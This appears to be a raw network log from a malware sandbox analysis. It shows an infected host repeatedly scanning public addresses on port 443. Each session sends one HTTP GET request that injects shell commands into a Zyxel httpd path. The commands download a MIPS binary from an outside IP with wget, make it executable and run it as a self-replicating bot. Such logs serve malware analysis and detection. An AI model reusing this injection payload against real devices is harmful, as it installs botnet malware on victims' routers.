                                                Jan 12, 2024 18:16:29.602946043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6017192.168.2.2352294216.97.252.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.602998018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6018192.168.2.236051637.98.81.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603048086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6019192.168.2.234550039.159.162.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603080034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6020192.168.2.236082046.104.221.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603110075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6021192.168.2.2339232137.151.24.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603167057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6022192.168.2.2346288150.18.206.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603185892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6023192.168.2.2336148221.218.177.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603230000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6024192.168.2.2337066210.203.81.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603276014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6025192.168.2.2349774163.194.171.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603318930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6026192.168.2.235672069.227.27.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603353024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6027192.168.2.2349306142.47.212.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603411913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6028192.168.2.2334120105.219.222.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603470087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6029192.168.2.235717477.184.225.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603492975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6030192.168.2.2352016182.201.169.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603514910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6031192.168.2.2352328188.222.151.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603539944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6032192.168.2.2338358148.37.147.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603585958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6033192.168.2.234458034.210.145.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603660107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6034192.168.2.2339182178.232.73.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603679895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6035192.168.2.2349514185.121.61.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603729010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6036192.168.2.235303085.82.79.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603761911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6037192.168.2.234979074.252.241.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603821039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6038192.168.2.233732877.184.96.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603844881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6039192.168.2.2348534195.137.54.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603895903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6040192.168.2.2349150117.39.232.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603951931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6041192.168.2.2357616148.31.95.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.603987932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6042192.168.2.2347904216.25.243.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604020119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6043192.168.2.2345180123.232.112.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604052067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6044192.168.2.2349868107.36.137.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604104996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6045192.168.2.235980039.209.195.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604132891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6046192.168.2.2343040112.170.78.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604163885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6047192.168.2.23515804.240.135.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604192019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6048192.168.2.233329817.244.49.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604248047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6049192.168.2.2333132216.144.249.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604284048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6050192.168.2.235659849.102.221.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604305029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6051192.168.2.2350628101.135.60.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604350090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6052192.168.2.233331269.57.120.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604398966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6053192.168.2.234791886.93.208.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604439974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6054192.168.2.234804247.175.187.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604482889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6055192.168.2.2358070175.13.83.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604513884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6056192.168.2.234012492.46.130.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604549885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6057192.168.2.23557464.111.69.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604603052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6058192.168.2.234926695.229.210.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604633093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6059192.168.2.2337852101.75.236.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604691982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6060192.168.2.2334618148.186.218.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604727030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6061192.168.2.2344634221.61.28.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604768991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6062192.168.2.2346066129.37.190.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604821920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6063192.168.2.233594273.165.187.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604866028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6064192.168.2.2334636119.202.195.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604901075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6065192.168.2.2344338178.121.152.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604942083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6066192.168.2.234937017.190.190.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.604979038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6067192.168.2.2336216122.116.239.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605020046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6068192.168.2.2360444173.218.217.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605062008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6069192.168.2.233871890.47.48.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605093956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6070192.168.2.235246085.174.108.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605138063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6071192.168.2.2356540115.9.77.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605175972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6072192.168.2.234884437.72.88.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605225086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6073192.168.2.234620095.57.105.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605268955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6074192.168.2.2351298220.245.26.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605293036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6075192.168.2.2334670144.28.75.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605331898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6076192.168.2.23445341.84.76.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605395079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6077192.168.2.2351352184.101.140.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605418921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6078192.168.2.2355432103.245.185.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:29.605470896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6079192.168.2.234840092.73.160.121443
                                                TimestampBytes transferredDirectionData
